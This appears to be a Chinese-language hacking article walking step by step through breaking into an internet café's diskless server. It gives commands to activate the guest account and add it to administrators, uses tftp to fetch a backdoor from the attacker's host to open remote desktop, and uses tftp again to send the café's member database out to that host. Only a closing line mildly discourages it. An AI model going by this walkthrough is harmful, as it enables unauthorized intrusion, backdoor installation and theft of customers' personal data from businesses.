无盘网吧的运行机制是通过服务器的资源映射到客户端，网吧机器的所有资源都来源于服务器，如果黑客入侵网吧服务器，那么病毒的感染building影响到整个网吧的客户端。作为网吧热点，小编与大家分享一下黑客入侵网吧服务器的过程。
　　一、确定目标
　　首先要确定要攻击的目标，即网吧服务器的IP是多少。我所在网吧的客户机装的是Windows98+万象2003，估计服务器应该是Windows2k以上，用Superscan3.0扫了一下192.168.0.1~192.168.0.254这个范围的135端口确实只有一台服务器没有错，目标确定。
　　二、开始入侵
　　既然服务器开了135端口，那么先用RPC服务缓冲区溢出漏洞溢出工具“RPCExploitGUI”试试看，选择目标为win2k（ALL）和winxp（ALL）都没有成功，或许是打了补丁，也可能是借助天网防火墙之类的对135端口做了限制。打开Superscan，扫了一下192.168.0.100（刚才扫出的服务器内部IP地址）的“1~500”端口。
　　结果显示服务器开了21（ftp），80（http），135（LocationService），139（NetBIos），445（Microsoft-DS）端口，在IE地址栏内输入"ftp://192.168.0.100",有个共享目录Backup，打开浏览了一遍。
　　返回Superscan，可以看到结果栏里显示服务器用的是IIS5.1，可以确定目标服务器用的是WindowsXP，看来用Webdavx溢出XP的机子是没希望了，用X-scan扫描服务器网页，报告发现.idq/.ida映射的溢出漏洞。
　　先做个账号，这要用到几条命令：（括号内为注解，不要输入）
　　netuserguest/active:yes（启用账户guest）
　　netuserguest12345（把账户guest的密码设为12345）
　　netlocalgroupadministrators/addguest（把账户guest加到administrators组，具有最高权限，默认为Guests组）
　　回到溢出shell，把djxyxs.exe传到服务器，执行“tftp-i192.168.0.50getdjxyxs.exeC:windowssystemdjxyxs.exe，传过来了，再执行“djxyxs”程序，对方的3389端口就要开了。
　　后门制作好了以后，来窃取服务器的会员数据库(这是本文的重点)，服务端一般是被装在C盘的Octopus目录下，执行“tftp-i192.168.0.50putOct2003.mdbc:octopusOct2003.mdb”，一盏茶的功夫，数据库下载过来了，但是怎么打开呢。
　　可以用Excel，但网吧里不会装这种玩意，记得服务器的共享目录Backup里有个万象2003的安装程序，把它的服务端装到本机D盘根目录，用刚刚下载到C盘的Oct2003.mdb覆盖掉本机“D:Octopus”目录里的空数据库文件，再运行服务端程序“server.exe”可以看到本网吧的所有会员。
　　通过这样的方式，就成功的入侵网吧服务器了，但是我个人不推荐哦。如果被网吧网管发现了话，可能要被警察给抓去的。影响网吧的经营。